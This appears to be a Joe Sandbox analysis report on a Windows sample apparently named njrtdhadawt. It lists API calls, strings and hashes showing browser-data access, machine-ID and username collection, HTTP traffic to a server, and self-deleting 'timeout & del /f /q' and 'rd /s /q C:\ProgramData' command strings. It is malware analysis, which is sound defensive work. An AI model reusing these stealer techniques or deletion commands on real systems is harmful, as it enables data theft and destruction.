APIs
• _memset.LIBCMT ref: 00FF7D18
• _memset.LIBCMT ref: 00FF7D27
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 00FF7D3C
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
• ShellExecuteEx.SHELL32(?), ref: 00FF7ED8
• _memset.LIBCMT ref: 00FF7EE7
• _memset.LIBCMT ref: 00FF7EF9
• ExitProcess.KERNEL32 ref: 00FF7F09
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
Strings
• " & exit, xrefs: 00FF7E5C
• /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00FF7E12
• " & exit, xrefs: 00FF7E0B
• " & rd /s /q "C:\ProgramData\, xrefs: 00FF7DB5
• /c timeout /t 10 & del /f /q ", xrefs: 00FF7D67
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: same associated dump files as listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
• String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
• API String ID: 2823247455-1079830800
• Opcode ID: 039fae708bdccba0e5c8b9d7e5ddf4ef5139de7ca635361243f9f2f7a3713c12
• Instruction ID: f3172389901d1d8154ea987568777118bb8bc8cbebd6c776bdcdc3b3935c1027
• Opcode Fuzzy Hash: 039fae708bdccba0e5c8b9d7e5ddf4ef5139de7ca635361243f9f2f7a3713c12
• Instruction Fuzzy Hash: 7151C5B2D4026E9BCB61EF25CC81AADB37CAF44704F4101E5A708B7122DB746F869F84
APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 00FF0BF8
• GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FF0C38
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00FF0C8D
• HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00FF0C94
• wsprintfA.USER32 ref: 00FF0CCA
• lstrcatA.KERNEL32(00000000,01015D6C), ref: 00FF0CD9
  • Part of subcall function 00FF18A7: GetCurrentHwProfileA.ADVAPI32(?), ref: 00FF18C2
  • Part of subcall function 00FF18A7: _memset.LIBCMT ref: 00FF18F1
  • Part of subcall function 00FF18A7: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 00FF1919
  • Part of subcall function 00FF18A7: lstrcatA.KERNEL32(?,01015DFC,?,?,?,?,?), ref: 00FF1936
• lstrlenA.KERNEL32(?), ref: 00FF0CF0
  • Part of subcall function 00FF27A7: malloc.MSVCRT ref: 00FF27AC
  • Part of subcall function 00FF27A7: strncpy.MSVCRT ref: 00FF27BD
• lstrcatA.KERNEL32(00000000,00000000), ref: 00FF0D13
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
• String ID: :\$C$QuBi
• API String ID: 1856320939-239756005
• Opcode ID: 46f9c51eebacc514d902c510a5f97c83c248089cee94a54b85ae1f2405deef70
• Instruction ID: 387a155c83683fe3d7746e05b28f93743414031ed0c307f567283ae08f3656e7
• Opcode Fuzzy Hash: 46f9c51eebacc514d902c510a5f97c83c248089cee94a54b85ae1f2405deef70
• Instruction Fuzzy Hash: EB419F7290012CAFCB249F759D49AEEBABCAF09300F0040E5F649E2125DA749F919F94
APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF2818: CreateFileA.KERNEL32(00FEECA7,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00FEECA7,C:\ProgramData\chrome.dll,?,?,?), ref: 00FF2832
  • Part of subcall function 00FE859F: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,00FEECAF), ref: 00FE85A4
• StrCmpCA.SHLWAPI(8D5052FC), ref: 00FEECD3
• StrCmpCA.SHLWAPI(8D5052FC), ref: 00FEED4A
• StrCmpCA.SHLWAPI(8D5052FC,firefox), ref: 00FEF05E
• StrCmpCA.SHLWAPI(8D5052FC), ref: 00FEEE40
  • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
• StrCmpCA.SHLWAPI(8D5052FC), ref: 00FEEEF1
• StrCmpCA.SHLWAPI(8D5052FC), ref: 00FEEF68
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcpy$CreateFileLibraryLoad
• String ID: Stable\$ Stable\$C:\ProgramData\chrome.dll$firefox
• API String ID: 781932549-1706742824
• Opcode ID: d9ec38415a1a45c3a46919117780d4f922d79715c9f3ae664db8da63efeb26d1
                                                                                                                                                                                                                                                          • Instruction ID: 082f8a6e77e19a23bcfa8db1a2ef7a2b7bfb057228cdb02aff75294193ced7e6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9ec38415a1a45c3a46919117780d4f922d79715c9f3ae664db8da63efeb26d1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABC18C33C001099BCB20FBA9ED47A9DB775BF40310F914151EE04A7256EA79AA19EBD2
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE6955: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE69B7
                                                                                                                                                                                                                                                            • Part of subcall function 00FE6955: StrCmpCA.SHLWAPI(?), ref: 00FE69D1
                                                                                                                                                                                                                                                            • Part of subcall function 00FE6955: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE6A00
                                                                                                                                                                                                                                                            • Part of subcall function 00FE6955: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00FE6A3F
                                                                                                                                                                                                                                                            • Part of subcall function 00FE6955: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FE6A6F
                                                                                                                                                                                                                                                            • Part of subcall function 00FE6955: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FE6A7A
                                                                                                                                                                                                                                                            • Part of subcall function 00FE6955: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00FE6A9E
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6AF7
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FF6B02
                                                                                                                                                                                                                                                            • Part of subcall function 00FF2042: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00FF6B0E,?), ref: 00FF205A
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,?), ref: 00FF6B17
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FF6B26
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00FF6B3F
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                          • API String ID: 4174444224-1526165396
                                                                                                                                                                                                                                                          • Opcode ID: 74320c4469b03b7bc332c63f4d6dbef438e3a792f4f1acca9e35902f88669821
                                                                                                                                                                                                                                                          • Instruction ID: 8dbec81737934c77f8411186eb6f8cda2c7aa037c850680a2b1f45952ae9fbce
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74320c4469b03b7bc332c63f4d6dbef438e3a792f4f1acca9e35902f88669821
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31217132D00148ABCB20BB75EC4A9BE7BA8AF45710B118465FF40EB127DE799D05AB91
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0E76: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE13A9), ref: 00FF0E82
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0E76: HeapAlloc.KERNEL32(00000000,?,?,?,00FE13A9), ref: 00FF0E89
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0E76: GetUserNameA.ADVAPI32(00000000,00FE13A9), ref: 00FF0E9D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00FF8011), ref: 00FF72AB
                                                                                                                                                                                                                                                          • OpenEventA.KERNEL32(001F0003,00000000,?,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF72B7
                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00FF8011), ref: 00FF72C8
                                                                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(?,00000000,010157A7), ref: 00FF74ED
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FF75AB
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FF75BE
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0BC5: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 00FF0BF8
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0BC5: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FF0C38
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0BC5: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00FF0C8D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF0BC5: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00FF0C94
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4B20: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE4BBF
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4B20: StrCmpCA.SHLWAPI(?), ref: 00FE4BDD
                                                                                                                                                                                                                                                            • Part of subcall function 00FF3B9F: StrCmpCA.SHLWAPI(?,block,?,?,00FF761B), ref: 00FF3BB4
                                                                                                                                                                                                                                                            • Part of subcall function 00FF3B9F: ExitProcess.KERNEL32 ref: 00FF3BBF
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5F2B: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE5FCA
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5F2B: StrCmpCA.SHLWAPI(?), ref: 00FE5FE8
                                                                                                                                                                                                                                                            • Part of subcall function 00FF335C: strtok_s.MSVCRT ref: 00FF337B
                                                                                                                                                                                                                                                            • Part of subcall function 00FF335C: strtok_s.MSVCRT ref: 00FF33FE
• Sleep.KERNEL32(000003E8), ref: 00FF7971
  • Part of subcall function 00FE5F2B: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE6180
  • Part of subcall function 00FE5F2B: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00FE61C4
  • Part of subcall function 00FE5F2B: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FE61F2
  • Part of subcall function 00FF2913: SHFileOperationA.SHELL32(?), ref: 00FF2949
• CloseHandle.KERNEL32(?), ref: 00FF7A6A
  • Part of subcall function 00FF7CF3: _memset.LIBCMT ref: 00FF7D18
  • Part of subcall function 00FF7CF3: _memset.LIBCMT ref: 00FF7D27
  • Part of subcall function 00FF7CF3: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 00FF7D3C
  • Part of subcall function 00FF7CF3: ShellExecuteEx.SHELL32(?), ref: 00FF7ED8
  • Part of subcall function 00FF7CF3: _memset.LIBCMT ref: 00FF7EE7
  • Part of subcall function 00FF7CF3: _memset.LIBCMT ref: 00FF7EF9
Strings
• a21440e9f7223be06be5f5e2f94969c7, xrefs: 00FF75E3
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: InternetOpen$Heap_memsetlstrcpy$Process$AllocCloseCreateDirectoryEventFileHandleNamestrtok_s$ConnectExecuteExitHttpInformationModuleOperationOptionRequestShellSleepUserVolumeWindowslstrcatlstrlen
• String ID: a21440e9f7223be06be5f5e2f94969c7
• API String ID: 1938121317-1852621708
• Opcode ID: ccde59f026c8be3b18dedae95943c4141e410ad7345ea0e34fda74d040fcd177
• Instruction ID: 779e940c2bce3f3b9cd744e014983eeb38349bc3549f55e61969b241076fbb4b
• Opcode Fuzzy Hash: ccde59f026c8be3b18dedae95943c4141e410ad7345ea0e34fda74d040fcd177
• Instruction Fuzzy Hash: A23261729083849BC620FF25DC476AEF7E5BFC0310F51491AFA8857262DB746A09DB93
APIs
• _memset.LIBCMT ref: 00FF182A
• RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00FF1849
• RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00FF186E
• RegCloseKey.ADVAPI32(?,?,?,?), ref: 00FF187A
• CharToOemA.USER32(?,?), ref: 00FF188E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: CharCloseOpenQueryValue_memset
• String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
• API String ID: 2235053359-1211650757
• Opcode ID: e91e839afa8c0cbc4d8756719899b1fec4f5a236af82f22770f7ffb574926eee
• Instruction ID: f208d2eeb2ddf6cbc0c6144fa74b03ade41e34beeae844d0356bd7408b67b56c
• Opcode Fuzzy Hash: e91e839afa8c0cbc4d8756719899b1fec4f5a236af82f22770f7ffb574926eee
• Instruction Fuzzy Hash: 9D1161B594021DAFDB20DF90DD89EEAB7BCEB04304F4041A5B659E6051E774AE888F50
APIs
• LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,00FEECAF), ref: 00FE85A4
• GetProcAddress.KERNEL32(00000000,connect_to_websocket), ref: 00FE85C4
• GetProcAddress.KERNEL32(free_result), ref: 00FE85D6
• FreeLibrary.KERNEL32 ref: 00FE85F1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: AddressLibraryProc$FreeLoad
• String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
• API String ID: 2256533930-1545816527
• Opcode ID: 513db1e216d392a8f8615afe8e8a16a5a65c2f5ded35c59e62fc2a327ef91c68
• Instruction ID: d5ce9c3829922ded3e7747f0ececd44025e05445e42ff4fd1d662a42779147dd
• Opcode Fuzzy Hash: 513db1e216d392a8f8615afe8e8a16a5a65c2f5ded35c59e62fc2a327ef91c68
• Instruction Fuzzy Hash: 97F0ED70D413519FCB72AF72FD0D5963AE5BB28362B05842AFA44D610DEFBA8401AF40
APIs
• __RTC_Initialize.LIBCMT ref: 6CD60BB1
• ___scrt_uninitialize_crt.LIBCMT ref: 6CD60BCB
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: Initialize___scrt_uninitialize_crt
• String ID:
• API String ID: 2442719207-0
• Opcode ID: c4fc907a6221121f30112cb8dd8442aaf7046a9ca4810f6c2cedce91afc6640b
• Instruction ID: a30a695a7f9a0ffa7c154a09cb18d2ae9b31489b4450918ebfffce09f7afdbf1
• Opcode Fuzzy Hash: c4fc907a6221121f30112cb8dd8442aaf7046a9ca4810f6c2cedce91afc6640b
• Instruction Fuzzy Hash: 5541C572E01298EFDB118F6BC840BAE7AB5EB417D8F118519E81567F60C730A905CBB8
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0D67
• HeapAlloc.KERNEL32(00000000,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0D6E
• RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,01015870,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0D9C
• RegQueryValueExA.KERNEL32(01015870,00000000,00000000,00000000,000000FF,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0DB8
• RegCloseKey.ADVAPI32(01015870,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0DC1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Heap$AllocCloseOpenProcessQueryValue
• String ID: Windows 11
• API String ID: 3466090806-2517555085
• Opcode ID: a8c68cf1f603b2c12c38d1e7ef81f1838f10d7019006df884a192739dc4021e3
• Instruction ID: 869d9a5d60b8f71a8e2546553105460518e385f0ce75c5586c40cdfae65bf48f
• Opcode Fuzzy Hash: a8c68cf1f603b2c12c38d1e7ef81f1838f10d7019006df884a192739dc4021e3
• Instruction Fuzzy Hash: A6F04F75600209BFEB205BD1EC0EFBE7AB9EF84704F544014F701E5199EBB19900AB14
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00FF0E3E,00FF0D7B,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0DE0
• HeapAlloc.KERNEL32(00000000,?,?,?,00FF0E3E,00FF0D7B,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0DE7
• RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,01015870,?,?,?,00FF0E3E,00FF0D7B,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0E05
• RegQueryValueExA.KERNEL32(01015870,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00FF0E3E,00FF0D7B,?,?,?,00FF4072,Windows: ), ref: 00FF0E20
• RegCloseKey.ADVAPI32(01015870,?,?,?,00FF0E3E,00FF0D7B,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0E29
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
